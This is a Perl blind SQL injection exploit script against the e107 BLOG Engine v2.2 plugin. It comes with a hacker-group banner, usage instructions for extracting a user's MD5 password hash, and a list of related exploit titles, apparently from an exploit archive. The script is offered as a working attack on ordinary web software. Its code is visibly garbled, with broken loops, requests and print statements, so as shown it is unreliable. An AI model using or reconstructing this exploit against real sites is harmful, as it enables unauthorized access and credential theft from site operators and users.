#!/usr/bin/perl
#####################################################################################
# e107 Plugin BLOG Engine v2.2 Blind SQL Injection Exploit #
# ..::virangar security team::.. #
# #
# C0d3d BY:virangar security team ( hadihadi ) #
#special tnx to: #
#MR.nosrati,black.shadowes,MR.hesy,Ali007,Zahra #
#& all virangar members & all hackerz #
# my lovely friends hadi_aryaie2004 & arash(imm02tal) #
# ..:::Young Iranina Hackerz::.. #
#####################################################################################
#[-] note: becuse e107 using diffrent prefix/table names may it's not work good,but i wrote it for default mod ;)
#this code is for english e107's only,if you want work on other languages,you can edit line 67;)use HTTP::Request;
use LWP::UserAgent;if (@ARGV != 1){
header();
}$host = $ARGV[0];print "n md5 Password:rn";
print "n[ ]Donen";
sub halghe {
for($i = 1; $i request(HTTP::Request-new(GET=$attack));
$res = $req-if ($res !~ /The user has hidden their blog./i){
return 1;
}}
sub header {
print qq{
###################################################################
# e107 Plugin BLOG Engine v2.2 Blind SQL Injection Exploit #
# (just for english e107's) #
# #
# Useage: perl $0 Host #
# #
# Host: full patch to macgurublog.php uid (dont forget ) #
# #
# Example: #
# perl $0 site/macgurublog_menu/macgurublog.php?uid=5 #
# #
###################################################################
};
}
【e107 Plugin BLOG Engine 2.2 Blind SQL Injection Exploit】相关文章:
★ DreamNews Manager (id) Remote SQL Injection Vulnerability
★ Wysi Wiki Wyg 1.0 (index.php c) Local File Inclusion Vulnerability
★ IntelliTamper 2.07 HTTP Header Remote Code Execution Exploit
★ IntelliTamper 2.07/2.08 Beta 4 A HREF Remote Buffer Overflow Exploit
★ Arctic Issue Tracker 2.0.0 (index.php filter) SQL Injection Exploit
★ MojoPersonals (mojoClassified.cgi mojo) Blind SQL Injection Exploit
★ WinRemotePC Full Lite 2008 r.2server Denial of Service Exploit
★ eNdonesia 8.4 (Calendar Module) Remote SQL Injection Exploit